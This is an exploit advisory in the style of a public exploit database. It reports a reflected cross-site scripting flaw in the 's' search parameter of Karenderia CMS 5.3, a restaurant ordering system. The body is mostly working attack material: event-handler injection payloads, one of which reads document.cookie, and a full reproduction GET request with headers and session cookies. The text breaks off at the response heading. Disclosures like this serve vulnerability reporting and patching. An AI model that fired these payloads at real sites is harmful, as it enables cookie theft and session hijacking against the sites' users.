# Exploit Title: Karenderia CMS 5.3 - Reflected Cross site scripting # Dork: N/A # Date: 09-07-2019 # Exploit Author: Sisyshell # Vendor Homepage: buyer2@codemywebapps.com # Software Link: https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694 # Version: v5.3 # Category: Webapps # Tested on: Windows # CVE: N/A Description --------------- Reflected XSS via 's' param at /searcharea?s=" onmouseover="console.log(document.cookie);" Payload: " onmouseover="console.log(document.cookie);" Browser: Firefox 67 Date Observed: 9 July 2019 Reproduction GET ---------------- GET http://bastisapp.com/kmrs/searcharea?s="+onmouseout="alert(1);" HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip, deflate Cache-Control: no-cache Connection: keep-alive Cookie: PHPSESSID=94kt2rgji1ir1fd1lnlha4m0q0; YII_CSRF_TOKEN=a2a652784b4e1f917ad08aba59a875be88c97873; kr_search_address=%22+onmouseout%3D%22alert%281%29%3B%22; client_location=%7B%22lat%22%3A0%2C%22long%22%3A0%7D DNT: 1 Host: [domain].com Pragma: no-cache Referer: http://[domain].com/kmrs/ Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0 Reproduction Response ---------------------